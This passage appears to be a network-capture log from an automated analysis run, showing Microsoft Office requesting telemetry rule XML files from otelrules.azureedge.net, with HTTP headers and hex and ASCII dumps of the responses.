                                                2024-10-29 23:23:09 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                135192.168.2.45818113.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:09 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:09 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:09 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1425
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                ETag: "0x8DC582BE6BD89A1"
                                                x-ms-request-id: a453eede-301e-0033-02d5-26fa9c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232309Z-17c5cb586f6mkpfkkpsf1dpups00000002g000000000c3tf
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:09 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                136192.168.2.45818213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:09 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:09 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:09 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1388
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                ETag: "0x8DC582BDBD9126E"
                                                x-ms-request-id: e02f31dd-001e-0082-0849-275880000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232309Z-16849878b78q9m8bqvwuva4svc00000005n000000000xwx1
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:09 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                137192.168.2.45818313.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:09 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:09 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:09 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1415
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                ETag: "0x8DC582BE7C66E85"
                                                x-ms-request-id: e75e1641-801e-00a3-2ec8-277cfb000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232309Z-r197bdfb6b4c8q4qvwwy2byzsw00000007dg00000000rn3h
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:09 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                138192.168.2.45818413.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:10 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:10 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:10 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1378
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                ETag: "0x8DC582BDB813B3F"
                                                x-ms-request-id: 7db2c7df-001e-000b-3d0b-2915a7000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232310Z-15b8d89586fcvr6p5956n5d0rc0000000d7000000000e3y1
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:10 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                139192.168.2.45818513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:10 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:10 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:10 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1405
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                ETag: "0x8DC582BE89A8F82"
                                                x-ms-request-id: 3b873659-401e-0067-0d93-2909c2000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232310Z-r197bdfb6b466qclztvgs64z1000000008zg000000004b5z
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:10 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                140192.168.2.45818613.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:10 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:10 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:10 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1368
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                ETag: "0x8DC582BE51CE7B3"
                                                x-ms-request-id: dbdc188e-001e-002b-6b28-2799f2000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232310Z-16849878b78zqkvcwgr6h55x9n00000006p000000000eeaa
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:10 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                141192.168.2.45818713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:10 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:10 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:10 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1415
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                ETag: "0x8DC582BDCE9703A"
                                                x-ms-request-id: 63860650-101e-00a2-42b4-279f2e000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232310Z-16849878b78qf2gleqhwczd21s00000007b000000000npf0
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:10 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                142192.168.2.45818813.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:10 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:10 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:10 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1378
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                ETag: "0x8DC582BE584C214"
                                                x-ms-request-id: 8e439449-301e-0051-2567-2838bb000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232310Z-15b8d89586fxdh48ft0acdbg4400000001000000000099xe
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:10 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                143192.168.2.45818913.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:11 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:11 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:11 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1407
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                ETag: "0x8DC582BE687B46A"
                                                x-ms-request-id: a86168e1-701e-0097-7f6b-27b8c1000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232311Z-17c5cb586f6w4mfs5xcmnrny6n00000008z000000000dxhe
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:11 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                144192.168.2.45819013.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:11 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:11 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:11 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1370
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                ETag: "0x8DC582BDE62E0AB"
                                                x-ms-request-id: 135a34dd-b01e-0098-371c-27cead000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232311Z-17c5cb586f6z6tw6g7cmdv30m800000008t0000000000e8e
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:23:11 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                145192.168.2.45819213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:23:11 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:23:11 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:23:11 GMT
                                                Content-Type: text/xml
                                                Content-Length: 1360
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
